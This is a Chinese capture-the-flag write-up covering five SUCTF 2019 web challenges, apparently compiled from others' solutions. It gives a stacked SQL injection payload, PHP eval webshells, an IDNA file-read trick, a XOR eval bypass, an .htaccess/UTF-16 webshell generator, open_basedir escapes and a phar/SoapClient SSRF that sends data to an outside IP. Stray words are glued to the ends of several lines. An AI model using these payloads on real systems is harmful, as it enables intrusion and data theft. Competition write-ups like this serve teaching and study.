處處抄來的SUCTF2019 web wp
0x01 EasySQL
這是一個考察堆疊注入的題目,可是這道題由於做者的過濾不夠徹底因此存在非預期解php
非預期解html
直接構造 *,1 這樣構造,最後拼接的查詢語句就變成了 select *,1||flag from Flag,能夠直接獲得當前表中的所有內容,就可以直接得到flagnginx
正常解題git
堆疊注入,先構造 1;show tables;#能夠獲得當前的表信息github
而且根據回顯,咱們能夠大體判斷查詢語句爲: ... POST['query']||flag ...web
直接構造 1;select * from Flag;# 出現Nonono, 能夠知道存在過濾,過濾了flagsql
這時候,經過堆疊注入,設置 sql_mode 的值爲 PIPES_AS_CONCAT,從而將 || 視爲字符串的鏈接操做符而非或運算符,因此構造出來的payload爲:1;set sql_mode=PIPES_AS_CONCAT;select 1shell
獲得flag後端
0x02 CheckIn
上傳文件的時候發現,上傳擴展名爲aaa的文件,回顯<? in contents!,說明文件的內容不能包含<?,能夠知道上傳的時候是黑名單過濾,直接把文件的尾綴改成jpg,回顯exif_imagetype:not image!服務器
猜想後端應該調用了php的exif_imagetype()函數,這個很好繞過,添加圖片文件頭就能夠了,我這裏添加的是GIF89a,上傳成功一個文件以後,在回顯中,發現上傳目錄中存在index.php文件
這裏就能夠知道須要用到.user.ini文件了,先上傳一個.user.ini文件,上傳文件內容爲
GIF89a
auto_prepend_file="test.png"
經過auto_prepend_file指定須要包含的文件,這裏我包含了一個test.png
接着在上傳須要包含進去的test.png文件,文件內容爲:
GIF89a
<script language="php">eval($_POST['five'])</script>
這時候,其實就把test.png文件裏面的一句話包含進了上傳文件目錄裏的index.php文件中,能夠直接在index.php中執行一句話,蟻劍連上,能夠在文件中找到flag,讀取就好
貼一篇優秀的文章
0x03 Pythonginx
進入頁面後給了源碼:
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
\#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->
這題的出題思路來自於今年BlackHat的一個議題,相關PPT以下:
其中關於Python的內容以下:
大佬寫的一個腳本,用來尋找可用字符:
\# coding:utf-8
for i in range(128,65537):
tmp=chr(i)
try:
res = tmp.encode('idna').decode('utf-8')
if("-") in res:
continue
print("U:{} A:{} ascii:{} ".format(tmp, res, i))
except:
pass
下面就是尋找利用方式了,根據題目中的提示:
前面的url部分應該是suctf.cc
還提到了Nginx,Nginx的配置文件目錄爲:/usr/local/nginx/conf/nginx.conf
跑上述腳本的的時候,其中有一個可利用字符:
由此能夠想到構造:file://suctf.c℆sr/local/nginx/conf/nginx.conf(另外一種繞過方式是利用ℂ來代替c及進行繞過),這樣能夠讀到flag的位置:
最後構造payload:file://suctf.c℆sr/fffffflag
0x04 EasyWeb
題目頁面給了源碼
<?php
function get_the_flag(){
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
if(!file_exists($userdir)){
mkdir($userdir);
}
if(!empty($_FILES["file"])){
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name,".")+1);
if(preg_match("/ph/i",$extension)) die("^_^");
if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
if(!exif_imagetype($tmp_name)) die("^_^");
$path= $userdir."/".$name;
@move_uploaded_file($tmp_name, $path);
print_r($path);
}
}
$hhh = @$_GET['_'];
if (!$hhh){
highlight_file(__FILE__);
}
if(strlen($hhh)>18){
die('One inch long, one inch strong!');
}
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
die('Try something else!');
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
eval($hhh);
?>
代碼分爲兩部分,上面是get_the_flag()函數,應該是一個文件上傳功能的驗證函數,下面是經過 _ 傳參進去,若是能經過一系列的檢驗則能夠執行eval()函數。若是這題是考RCE的話,爲何還要給出文件上傳的代,再看那些過濾,幾乎很難去繞過,因而考慮調用get_the_flag()函數來看看可不能夠經過文件上傳功能
因此接下來要構造payload繞過正則檢測而且調用get_the_flag() ,這裏的過濾很是嚴格,幾乎過濾了全部可見字符,能夠看下這篇文章 https://www.leavesongs.com/penetration/webshell-without-alphanum.html
就能夠知道如何來繞過了,這裏能夠利用不可見字符的異或來構造,腳本以下
<?php
$payload = '';
for($i=0;$i<strlen($argv[1]);$i++)
{
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255);
if($k == $argv[1][$i])
$payload .= '%'.dechex($j);
}
}
echo $payload;
能夠獲得
因此嘗試構造payload:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
構形成功,因而構造payload:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag
接下來就是經過上傳來getshell了,這裏確實是須要上傳.htaccess文件了,繞過方式能夠參考這篇文章:
http://www.javashuo.com/article/p-xmfiewue-dx.html
exif_imagetype() 的繞過方式和上面同樣
這裏注意到php版本爲7.2因此,不能用<script>標籤繞過<?的過濾了,能夠經過編碼進行繞過,如原來使用utf8編碼,若是shell中是用utf16編碼則能夠Bypass
直接利用腳本生成文件:
SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"
def generate_php_file(filename, script):
phpfile = open(filename, 'wb')
phpfile.write(script.encode('utf-16be'))
phpfile.write(SIZE_HEADER)
phpfile.close()
def generate_htacess():
htaccess = open('.htaccess', 'wb')
htaccess.write(SIZE_HEADER)
htaccess.write(b'AddType application/x-httpd-php .lethe\n')
htaccess.write(b'php_value zend.multibyte 1\n')
htaccess.write(b'php_value zend.detect_unicode 1\n')
htaccess.write(b'php_value display_errors 1\n')
htaccess.close()
generate_htacess()
generate_php_file("shell.lethe", "<?php eval($_GET['cmd']); die(); ?>")
而後利用Postman分別構造上傳.htaccess和shell.lethe:
獲得了文件路徑 upload/tmp_f4e7685fe689f675c85caeefaedcf40c/shell.lethe
利用shell.lethe執行命令了,可是還須要繞過open_basedir。
參考:從PHP底層看open_basedir bypass
因而構造payload以下:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(glob('*'));
獲得flag位置後,最後讀取flag便可,payload:
?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(file_get_contents(THis_Is_tHe_F14g));
0x05 Upload Lab 2
題目給了源碼,因此就是進行代碼審計
class Ad{
......
function __destruct(){
getFlag($this->ip, $this->port);
//使用你本身的服務器監聽一個確保能夠收到消息的端口來獲取flag
}
}
if($_SERVER['REMOTE_ADDR'] == '127.0.0.1'){
if(isset($_POST['admin'])){
$ip = $_POST['ip']; //你用來獲取flag的服務器ip
$port = $_POST['port']; //你用來獲取flag的服務器端口
$clazz = $_POST['clazz'];
$func1 = $_POST['func1'];
$func2 = $_POST['func2'];
$func3 = $_POST['func3'];
$arg1 = $_POST['arg1'];
$arg2 = $_POST['arg2'];
$arg2 = $_POST['arg3'];
$admin = new Ad($ip, $port, $clazz, $func1, $func2, $func3, $arg1, $arg2, $arg3);
$admin->check();
}
}
......
也就是說須要經過SSRF來反序列化觸發getFlag函數,因此繼續查看代碼
#class.php
......
function getMIME(){
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$this->type = finfo_file($finfo, $this->file_name);
finfo_close($finfo);
}
......
參考zsx的文章:https://blog.zsxsoft.com/post/38,查看finfo_file的底層代碼
闊以發現finfo_file也調用了,因此finfo_file也是可以觸發phar反序列化的,那麼就能夠利用SoapClient來經過SSRF以POST方式訪問到admin.php文件。不過在func.php中又作了限制
<?php
include 'class.php';
if (isset($_POST["submit"]) && isset($_POST["url"])) {
if(preg_match('/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i',$_POST['url'])){
die("Go away!");
}else{
$file_path = $_POST['url'];
$file = new File($file_path);
$file->getMIME();
echo "<p>Your file type is '$file' </p>";
}
}
phar協議不能出如今開頭,仍是zxs那篇文章裏寫的
也就是說闊以構造繞過一下來調用phar協議,這裏的吹一下altman(https://altman.vip/),fuzz到一個能夠利用的方法php://filter/resource=phar://
因此接下來就是生成一個phar腳本,上傳後經過func觸發就行了
<?php
class File{
public $file_name;
public $type;
public $func = "SoapClient";
function __construct(){
$this->file_name = array(null, array('location' => "http://127.0.0.1/admin.php", 'uri' => "c", 'user_agent' => "catcat\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\n\r\nip=72.19.12.57&port=1234&admin=1&clazz=ArrayIterator&func1=append&func2=append&func3=append&arg1=1&arg2=1&arg3=1\r\n\r\n\r\n"));
}
}
$o = new File();
$phar=new Phar('poc.phar');
$phar->startBuffering();
$phar->setStub("GIF89a< ?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("foo.txt","bar");
$phar->stopBuffering();
我本身在運行腳本的時候,出現了錯誤提示
須要把phar.readonly設置爲Off
而後改個後綴上傳,我這裏改爲了jpg,
vps上監聽一下端口,到func.php觸發就能夠了
問題來了~~~,我監聽不到,不知道是什麼問題,感受多是國外的IP,不能訪問???
迷惑,有時間再看吧,咕咕咕~~~
沒看懂,只能把網上大佬的wp搬過來了~~~
再加上點其餘大佬的連接
- 1. ISCC 2016 WEB WP
- 2. bugku web wp(一)
- 3. CTF web題 wp:
- 4. 南郵ctf(web wp)
- 5. 南郵0xGame2020 Wp(Web)
- 6. Web的文件處理
- 7. WindowsSdkDir 從何處來?
- 8. WP Engine開發人員工具的好處
- 9. CTF Web題 部分WP
- 10. 2018 ISCC re\web\misc WP
- 更多相關文章...
- • 錯誤處理 - RUST 教程
- • Lua 錯誤處理 - Lua 教程
- • 互聯網組織的未來:剖析GitHub員工的任性之源
- • 漫談MySQL的鎖機制
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. ISCC 2016 WEB WP
- 2. bugku web wp(一)
- 3. CTF web題 wp:
- 4. 南郵ctf(web wp)
- 5. 南郵0xGame2020 Wp(Web)
- 6. Web的文件處理
- 7. WindowsSdkDir 從何處來?
- 8. WP Engine開發人員工具的好處
- 9. CTF Web題 部分WP
- 10. 2018 ISCC re\web\misc WP